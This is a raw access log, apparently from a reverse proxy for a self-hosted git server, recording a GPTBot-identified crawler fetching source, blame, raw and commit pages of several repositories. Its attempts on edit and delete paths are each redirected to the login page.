"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" +[17/Feb/2026:15:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json?display=source" [Client 74.7.227.38] [Length 11065] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" +[17/Feb/2026:15:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" +[17/Feb/2026:15:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" +[17/Feb/2026:15:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" +[17/Feb/2026:15:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" +[17/Feb/2026:15:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" +[17/Feb/2026:15:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fservices" [Client 74.7.227.38] [Length 25015] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" +[17/Feb/2026:15:11:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" +[17/Feb/2026:15:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/status.json" +[17/Feb/2026:15:11:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" +[17/Feb/2026:15:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/status.json" +[17/Feb/2026:15:11:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/tsconfig.json" +[17/Feb/2026:15:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/tsconfig.json" +[17/Feb/2026:15:11:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/tsconfig.json" +[17/Feb/2026:15:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/tsconfig.json" +[17/Feb/2026:15:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/status.json" [Client 74.7.227.38] [Length 10608] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" +[17/Feb/2026:15:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" +[17/Feb/2026:15:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/status.json" [Client 74.7.227.38] [Length 6228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" +[17/Feb/2026:15:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/status.json" [Client 74.7.227.38] [Length 11595] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" +[17/Feb/2026:15:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0" [Client 74.7.227.38] [Length 25661] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11103] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10907] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14644] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:11:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/status.json" +[17/Feb/2026:15:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/status.json" +[17/Feb/2026:15:11:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/status.json" +[17/Feb/2026:15:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/status.json" +[17/Feb/2026:15:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" +[17/Feb/2026:15:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 11489] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11756] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:15:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9902] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20386] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11042] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:11:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" +[17/Feb/2026:15:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/metadata.json" +[17/Feb/2026:15:11:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" +[17/Feb/2026:15:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/metadata.json" +[17/Feb/2026:15:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" +[17/Feb/2026:15:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/metadata.json" [Client 74.7.227.38] [Length 9771] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" +[17/Feb/2026:15:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12892] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" +[17/Feb/2026:15:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10024] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:15:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 